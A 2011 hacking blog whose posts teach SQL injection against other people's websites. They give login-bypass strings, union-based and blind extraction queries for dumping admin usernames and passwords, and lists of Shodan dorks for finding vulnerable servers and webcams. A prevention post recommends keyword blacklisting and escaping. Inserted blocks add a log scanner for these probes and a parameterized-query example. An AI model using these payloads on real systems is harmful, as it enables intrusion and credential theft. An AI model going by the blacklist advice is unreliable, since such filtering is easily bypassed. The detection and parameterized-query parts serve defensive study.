Wednesday, February 16, 2011

SQL INJECTION IN DETAIL (Cont.)


Hello, I am back with good news: I got a job :) Let's continue with my previous article about SQL Injection.
Here I am explaining blind SQLi. It is a time-consuming injection because you will have to guess many things, which means you should have good guessing power as well as luck :).


BLIND SQL INJECTION :-
     I think I need to give a definition of blind injection here, so I am taking it from Wikipedia. Here is the definition: http://en.wikipedia.org/wiki/SQL_injection#Blind_SQL_injection

Testing if the target is vulnerable to MySQL blind injection :-
=> http://targetsite.com/news.php?id=5 and 1=1
^ this is always true, so the page loads normally :))
=> http://test.com/news.php?id=5 and 1=2
^ this one is false :P. If some text, picture or other content is missing from the returned page, then the site is vulnerable to blind SQL injection.

Getting the MySQL version in blind SQLi :- to get the version in a blind attack we use substring(), i.e.
  => http://targetsite.com/news.php?id=5 and substring(@@version,1,1)=4
       ^ this should return TRUE if the MySQL version is 4 (replace 4 with 5; if the query returns TRUE then the version is 5).
Now test if subselects work (when select doesn't work we use a subselect), i.e.
=> http://targetsite.com/news.php?id=5 and (select 1)=1
      ^ if the page loads normally then subselects work.
Now let's see if we have access to => mysql.user
=> http://targetsite.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
If the page loads normally we have access to mysql.user, and later we can fetch some passwords using the load_file() function and OUTFILE.

Check table and column names :-
# The guessing work starts here, i.e.
=> http://targetsite.com/news.php?id=5 and (select 1 from users limit 0,1)=1
  ^ (with limit 0,1 our query returns 1 row of data, because a subselect used like this must return only 1 row; this is very important). If the page loads normally without content missing, the table users exists. If you get FALSE (or some content is missing), just change the table name until you guess the right one :). Let's say that I have found that the table name is users; now what we need is the column name !! :D
# Same as for the table name, we start guessing.
=> http://targetsite.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
# If the page loads normally we know that the column name is password (if we get false then try common names or just guess).
Here we concatenate 1 with the column password, then substring() returns the first character (,1,1), which is always '1' when the column exists, so the comparison is TRUE only if the column is there.

Fetch data from the database :-
I found the table users with the columns username and password, so I'm going to pull characters from it.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
OK, this fetches the first character of the first user in the table users.
substring() here returns the first character, 1 character in length; ascii() converts that character into its ASCII value,
and then we compare it with the greater-than operator ">". So if the ASCII value is greater than 80, the page loads normally: TRUE.

>> keep trying until you get FALSE.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95
# we get TRUE, keep incrementing
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98
TRUE again, increment
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
got FALSE!!!
So the first character of the username is char(99). Using an ASCII table we know that char(99) is the letter 'c'.

=>> then let's check the second character.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
# Note that I have changed ,1,1 to ,2,1 to get the second character (now it returns the second character, 1 character in length).
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
TRUE, the page loads normally, go higher.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>107
# FALSE, lower the number.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>104
# TRUE, increment.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>105
# FALSE!!!
# We know that the second character is char(105), which is 'i'. We have 'ci' so far.
# Keep incrementing until you reach the end (when >0 returns FALSE we know that we have reached the end and have got the data we wanted from the table).

I know that this injection is really boring and tough. So try at least one site using this method; otherwise there are many tools which help you with blind SQLi, and you can use them also.

Wait for my next article :)
sanjeev






Tuesday, February 8, 2011

SQL INJECTION IN DETAIL


Today I am posting this article after so many days because I was busy with placement-related stuff.
Hello guys, my last post was on "prevention against SQLI", so I decided to write about the SQL Injection attack :P. Here I will explain everything briefly, but make sure that you won't use this information for wrong things, as I don't take any responsibility for what you guys do with this information; it's all up to you :)
 So let's start. Today I will explain:
1 STRING INJECTION : to bypass login form authentication.
2 UNION SELECT
3 BLIND SQLI
4 ERROR BASED SQL INJECTION   /* in MSSQL; I have not tried this one but will post about it also */

1. So let's start with the first one. This is so simple that anyone can try his/her hand at bypassing login form security using this method. In this method you first have to find the admin login page of the site you want to hack. You can find it using your intelligence or some freely available tools. Now, after getting the login
page, all you have to do is enter the administrator's username and password and you are done.
Let's move on to the second method.....hahahaha......don't get angry...we still have some work to do after getting the login page, because we don't have the admin's username and password.
Now if you are lucky enough, your target may be vulnerable to this attack. All you have to do is write the following information in the form:

USERNAME : admin, administrator, master, manager, targetsite_admin, %admin%, or you can try some general username; in most cases these will work, depending on your luck :P
PASSWORD : in the password field use any of these strings.
' or 1=1--
" or 1=1--
or 1=1--
1'or'1'='1
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
Finally you are done. If your target is vulnerable you will get access for sure. 

2. Union method : now let's move towards some real work. In this one you have to do everything manually, using your mind and skills, so let's start the job.
>>> >>> >>>
 Let's start with the union attack :
Our aim is to find the TABLE NAME, the COLUMN NAME and then the username and password.

=> http://targetsite.com/index.php?id=1 order by 10--
^ This gives me an error
keep trying
=> http://targetsite.com/index.php?id=1 order by 7--
^ error again, arggg!!!! I hate it
keep trying
=> http://targetsite.com/index.php?id=1 order by 5--
the page loads normally.........woooooohh
This means the number of columns = 5
 Now the next part:
 using a union select statement.
=> http://targetsite.com/index.php?id=1 union all select 1,2,3,4,5--
If it doesn't give you anything, change the first part of the query to a negative value.
=> http://targetsite.com/index.php?id=-1 union all select 1,2,3,4,5--
It'll show some number on your screen. Let's say it is 2. Now we know that column 2 will echo data back to us. :D

Now getting the MySQL version
=> http://targetsite.com/index.php?id=-1 union all select 1,@@version,3,4,5--
If you do not get it with this, try this:
=> http://targetsite.com/index.php?id=-1 union select 1,version(),3,4,5--
Now you will get the version name.
It can be:
==> 5+ /* version 5 or above */
==> <5 /* version below 5 */

Now extracting tables for version 5+ :
=> http://targetsite.com/index.php?id=-1 union all select 1,group_concat(table_name),3,4,5 from information_schema.tables--

It'll show a lot of tables; if you want to get admin privileges in order to hack the site, then you are looking for the "admin" table.
Now I have the table names and I need to extract the column names from them, so the query will be:

=> http://targetsite.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=admin--

This will show you the column names inside the table admin. If it gives you an error you need to change the text value admin into MySQL CHAR() form. Use HackBar, a Firefox add-on, to do so, or use any other tool, or write it yourself if you know the ASCII value of every character.
so the CHAR form of admin is => CHAR(97, 100, 109, 105, 110)
therefore the query will be:

=> http://targetsite.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

It will show you many columns, but we only need the user name and password columns of the admin table:

=> http://targetsite.com/index.php?id=-1 union all select 1,group_concat(user_name,0x3a,user_password),3,4,5 from admin--
 /* where 0x3a is the hex value of => : (colon) */

wooooohhh, it's time to party: you got the admin name and password.
The password can also be encrypted, so you can use decrypters to decode it.
This was all for MySQL 5+
=============================================================
Let's start with MySQL version below 5 :
Version 4, or anything below 5, does not contain ==> information_schema
 This method is all about guessing :p
We know the number of columns, that is 5.
=> Let's start guessing the table:
=> http://targetsite.com/index.php?id=-1 union all select 1,2,3,4,5 from users--
^ got an error ...give it one more try
=> http://targetsite.com/index.php?id=-1 union all select 1,2,3,4,5 from Admin--
^ Suppose this does not give me an error; it means it worked and we got the table name.

==> The next part is guessing the columns:
As we found earlier, the vulnerable column is 2, so let's proceed further.
=> http://targetsite.com/index.php?id=-1 union all select 1,user,3,4,5 from admin--
^ got an error. shit!!!!!!
=> http://test.com/index.php?id=-1 union all select 1,username,3,4,5 from admin--
^ no error..... yes, I got the column name

==> let's guess the password column now

=> http://test.com/index.php?id=-1 union all select 1,pass,3,4,5 from admin--
^ got an error, one more try:
=> http://targetsite.com/index.php?id=-1 union all select 1,password,3,4,5 from admin--

We did it; we got the password column successfully, so cheers.

This is the end of the union method for MySQL; you can try the same for MSSQL. Wait for my next post, where I will post about both blind injection and error based injection :)
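Added here as an example (not code from the original article): detection logic, from the server side, for the request patterns that the blind post above and this union post walk through. The log lines are constructed, and the signatures, the Common Log Format parser and the per-client threshold are assumptions.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Constructed sample access log (not from the original article): one client runs
# the boolean probes from the blind post, another the order by / union probes
# from the union post, and a third is ordinary traffic.
SAMPLE_LOG = """\
10.0.0.7 - - [16/Feb/2011:10:00:02 +0000] "GET /news.php?id=5%20and%201=1 HTTP/1.1" 200 4120
10.0.0.7 - - [16/Feb/2011:10:00:03 +0000] "GET /news.php?id=5%20and%201=2 HTTP/1.1" 200 2890
10.0.0.7 - - [16/Feb/2011:10:00:04 +0000] "GET /news.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))>80 HTTP/1.1" 200 4120
10.0.0.7 - - [16/Feb/2011:10:00:05 +0000] "GET /news.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))>95 HTTP/1.1" 200 4120
10.0.0.9 - - [16/Feb/2011:10:01:01 +0000] "GET /index.php?id=1%20order%20by%2010-- HTTP/1.1" 500 512
10.0.0.9 - - [16/Feb/2011:10:01:02 +0000] "GET /index.php?id=-1%20union%20all%20select%201,2,3,4,5-- HTTP/1.1" 200 3100
10.0.0.20 - - [16/Feb/2011:10:02:01 +0000] "GET /index.php?id=21 HTTP/1.1" 200 5000
"""

# Common Log Format, with the request line split into method and path.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)')

# Signatures taken from the probes the two posts show; they are matched against
# the URL-decoded path so that %20 encoding does not hide them.
PROBES = {
    "boolean_probe":   re.compile(r"\band\s+1\s*=\s*[12]\b", re.I),
    "char_extraction": re.compile(r"ascii\s*\(\s*substring\s*\(", re.I),
    "column_count":    re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select":    re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
}

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None                      # unparseable line: skip, do not crash
    rec = m.groupdict()
    rec["path"] = unquote_plus(rec["path"])
    return rec

def classify(path):
    """Names of every probe signature present in one decoded request path."""
    return [name for name, rx in PROBES.items() if rx.search(path)]

def scan(log_text, threshold=2):
    """Count probe hits per client IP and return the clients at or above threshold.
    Blind extraction is a long run of near-identical requests, so the count is the signal."""
    hits = defaultdict(Counter)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name in classify(rec["path"]):
            hits[rec["ip"]][name] += 1
    return {ip: dict(c) for ip, c in hits.items() if sum(c.values()) >= threshold}
```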

Wednesday, February 2, 2011

Prevention against SQL Injection

Hello friends, these days I have hacked many sites using SQL Injection. So I thought about writing how to protect our web pages against this attack. There are many methods to prevent SQLi, but I am writing a few of them.
Let's say our code is:

<?php
$display = mysql_query('SELECT text FROM pages WHERE id=' . $_GET['id']);
$row = mysql_fetch_assoc($display);   // mysql_query() returns a result set, not the text itself
echo $row['text'];
?>
This means that we are selecting the page content 'text' from 'pages' in the SQL database, and we are selecting the right page content with $_GET['id']; $_GET['id'] is the value in the URL, for example
http://target.com/index.php?id=21
The above code is easily injectable and is enough for an attacker to enter your site without proper authentication.
But if we replace the above code with the code written below, then I guess we are 99.9% secure :P

<?php
// The escaped value must sit inside quotes in the SQL text: mysql_real_escape_string()
// only neutralises quote and escape characters, so it does nothing for a bare number.
$display = mysql_query("SELECT text FROM pages WHERE id='" . mysql_real_escape_string($_GET['id']) . "'");
$row = mysql_fetch_assoc($display);
echo $row['text'];
?>
In the above code mysql_real_escape_string() calls MySQL's library function mysql_real_escape_string, which prepends backslashes to the following characters: \x00, \n, \r, \, ', ". This function must always be used to make data safe before sending a query to MySQL.
Alternatively we can check $_GET['id'] for illegal and unwanted characters like this:


<?php
$id = strtolower($_GET['id']);
// Reject the request outright if a blacklisted keyword appears anywhere in the value.
if (strrpos($id, 'union') !== false) {
    die();
}
if (strrpos($id, 'select') !== false) {
    die();
}
$display = mysql_query('SELECT text FROM pages WHERE id=' . $_GET['id']);
$row = mysql_fetch_assoc($display);
echo $row['text'];
?>
Similarly we can block information_schema, admin, order and other such keywords. :)
If we want we can use JavaScript to block and filter characters. This would also be useful for getting rid of the basic SQL string injection that is done at login forms.
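Added here as a worked example (not the post's own code): the post's three variants recreated in Python against a constructed in-memory SQLite table, plus a parameterized query, which the post does not cover and is the standard fix. The probe_differs() check is the post's own `and 1=1` / `and 1=2` test applied locally: if a true and a false condition give different results, the input is being executed as SQL. Function names, the escape emulation and the sample rows are assumptions.

```python
import sqlite3

# Constructed in-memory stand-in for the post's 'pages' table (SQLite, not MySQL).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, text TEXT)")
conn.executemany("INSERT INTO pages VALUES (?, ?)", [(5, "page five"), (21, "page 21")])

def mysql_style_escape(value):
    """Backslash-escape the characters the post lists for mysql_real_escape_string
    (\\x00, \\n, \\r, \\, ', \"). Escaping only matters once the value is placed
    inside quotes in the SQL text; a bare numeric context never contains them."""
    special = {"\x00": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\", "'": "\\'", '"': '\\"'}
    return "".join(special.get(ch, ch) for ch in value)

def lookup_concat(page_id):
    """The post's first snippet: the raw id is pasted into the SQL string."""
    return conn.execute("SELECT text FROM pages WHERE id=" + page_id).fetchall()

def lookup_escaped_unquoted(page_id):
    """The post's second snippet: escaped, but still glued on as a bare number."""
    return conn.execute("SELECT text FROM pages WHERE id=" + mysql_style_escape(page_id)).fetchall()

def lookup_param(page_id):
    """Parameterized query (assumed fix, not from the post): the id is validated as an
    integer and then bound as data, so it can never be parsed as SQL."""
    if not page_id.lstrip("-").isdigit():
        return []                                   # reject non-numeric ids up front
    return conn.execute("SELECT text FROM pages WHERE id=?", (int(page_id),)).fetchall()

def probe_differs(lookup, base="5"):
    """The post's own vulnerability test: append a true and a false condition to the id
    and compare the two responses. They differ only if the input runs as SQL."""
    return lookup(base + " and 1=1") != lookup(base + " and 1=2")
```

Running probe_differs() over the three lookups shows the first two still answer the probe differently, while the parameterized version returns the same (empty) result for both.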

I hope you like this post :=))

Tuesday, February 1, 2011

Advance search engine for hackers - SHODAN

Hello guys, are you tired of using Google dorks to search for your target? Or do you think that it takes time to search for vulnerabilities because it is a hit-and-trial method :P
Today I am posting about the SHODAN search engine. I found it very useful for searching servers, routers, webcams, ports etc. It finds computers running certain software (HTTP, FTP etc.) and, most interestingly, it filters hosts based on geographical location directly.
    SHODAN stands for Sentient Hyper-Optimized Data Access Network. It gives more accurate as well as more helpful information. If you are really looking for vulnerabilities then use Shodan and Google and you will feel the difference; I am saying this because Google looks at the web content only, whereas Shodan can show you in plain text the network part of the host.
Here is the website's link: http://www.shodanhq.com
e.g. let us suppose I want to search for hosts which are running the IIS 5 server; then my query will be:

http://www.shodanhq.com/?q=iis+5.0
It gives results like:

HTTP/1.0 403 Forbidden
Content-Length: 1283
Content-Type: text/html
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 20:37:47 GMT


Just like this you will get 1123104 results for iis 5.0.
Here I am posting some dorks for SHODAN that will help you to search:

http://shodan.surtri.com/?q=cisco-IOS
http://shodan.surtri.com/?q=IIS+4.0
http://shodan.surtri.com/?q=Xerver (REF: http://www.exploit-db.com/exploits/9718)
http://shodan.surtri.com/?q=Fuji+xerox
http://shodan.surtri.com/?q=JetDirect
http://shodan.surtri.com/?q=port:23+%22list+of+built-in+commands%22
http://shodan.surtri.com/?q=port%3A80+iisstart.html
http://shodan.surtri.com/?q=Server:%20SQ-WEBCAM
http://shodan.surtri.com/?q=Netgear
http://shodan.surtri.com/?q=%22Anonymous+access+allowed%22
http://shodan.surtri.com/?q=Golden+FTP+Server 
http://shodan.surtri.com/?q=IIS+5.0  
http://shodan.surtri.com/?q=IIS+6.0
http://shodan.surtri.com/?q=%22Server%3A+iWeb%22+HTTP 
http://shodan.surtri.com/?q=Wordpress
http://shodan.surtri.com/?q=Joomla
http://shodan.surtri.com/?q=Drupal
http://shodan.surtri.com/?q=iPhone+Web+Server
http://shodan.surtri.com/?q=FreeBSD
http://shodan.surtri.com/?q=IPCop
There are more dorks; if you need them just send me mail.
Now the rest depends on your brain and common sense. Use your intelligence to use it efficiently.
Happy Searching :=))